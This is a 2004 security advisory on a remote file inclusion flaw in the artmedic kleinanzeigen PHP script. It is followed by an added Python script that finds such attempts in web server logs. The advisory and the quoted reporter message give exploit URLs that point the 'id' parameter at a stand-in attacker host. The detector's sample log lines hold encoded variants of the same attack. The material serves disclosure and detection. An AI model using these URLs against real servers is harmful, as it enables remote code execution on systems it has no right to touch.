SecurityTracker.com
Category:   Application (Generic)  >   artmedic kleinanzeigen
Vendors:   artmedic webdesign
artmedic kleinanzeigen Include File Error Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1010740
SecurityTracker URL:  http://securitytracker.com/id/1010740
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jul 19 2004
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  

Description:   An include file vulnerability was reported in artmedic kleinanzeigen. A remote user can execute arbitrary code on the target system.

Dominus_Vis from Infektion Group reported that a remote user can supply a specially crafted HTTP request to cause arbitrary PHP code at a remote site to be included by and executed on the target server.

A demonstration exploit URL is provided:

[target]/artmedic-kleinanzeigen-path/index.php?id=http://[evil-host]

Impact:   A remote user can execute arbitrary PHP code, including operating system commands on the target system. The code will run with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.artmedic-phpscripts.de/artmedic_kleinanzeigen.php
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.
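
Added example (not part of the original advisory or the vendor's code): a log check for the request pattern shown above, an `id` value on index.php that begins with a URL scheme. It assumes a combined-format access log; the sample lines, addresses and the `remote.example` host are constructed, and it goes beyond the advisory's `http://` case to cover other schemes and percent-encoded variants.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: Apache/nginx "combined" access-log format.
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD|POST) (\S+) [^"]*" (\d{3})')
# Value that starts with a URL scheme (http://, ftp://, php://, ...) or data:
SCHEME_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*://|data:)', re.I)

# Constructed sample lines; addresses and hosts are documentation values.
SAMPLE_LOG = [
    '198.51.100.4 - - [19/Jul/2004:09:58:11 +0000] "GET /kleinanzeigen/index.php?id=12 HTTP/1.0" 200 4312',
    '203.0.113.7 - - [19/Jul/2004:10:01:02 +0000] "GET /kleinanzeigen/index.php?id=http://remote.example/inc.txt HTTP/1.0" 200 512',
    '203.0.113.7 - - [19/Jul/2004:10:01:09 +0000] "GET /kleinanzeigen/index.php?id=HTTP%3A%2F%2Fremote.example%2Finc.txt HTTP/1.0" 200 512',
    '203.0.113.9 - - [19/Jul/2004:10:02:30 +0000] "GET /kleinanzeigen/index.php?id=%2568ttp%253A%252F%252Fremote.example HTTP/1.0" 404 0',
    '198.51.100.4 - - [19/Jul/2004:10:03:00 +0000] "GET /links.php?id=http://remote.example/ HTTP/1.0" 200 90',
]

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %2568ttp) that hides the scheme."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_include_attempts(lines, script="index.php", param="id"):
    """Return (client, status, decoded value) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.lower().endswith("/" + script):
            continue  # only the script named in the advisory
        # parse_qs already removes one layer of percent-encoding
        for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
            value = fully_decode(value)
            if SCHEME_RE.match(value):
                hits.append((client, int(status), value))
    return hits

if __name__ == "__main__":
    for hit in find_include_attempts(SAMPLE_LOG):
        print(hit)
```

A hit answered with status 200 deserves a closer look than one answered with 404, since the script was reached with the remote value in place.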


 Source Message Contents

Subject:  Artmedic kleinanzeigen include vulnerability




Artmedic kleinanzeigen allows code inclusion in index.php. 
 
Exploit: 
www.host.com/artmedic-kleinanzeigen-path/index.php?id=http://evil-host.com 
 
An evil attacker could use this vulnerability to execute 
PHP code with the same user id of the running server. 
 
Thanks and sorry for the bad English 
Dominus_Vis from Infektion Group :> 
irc.phey.net -j #infektion 

 
 

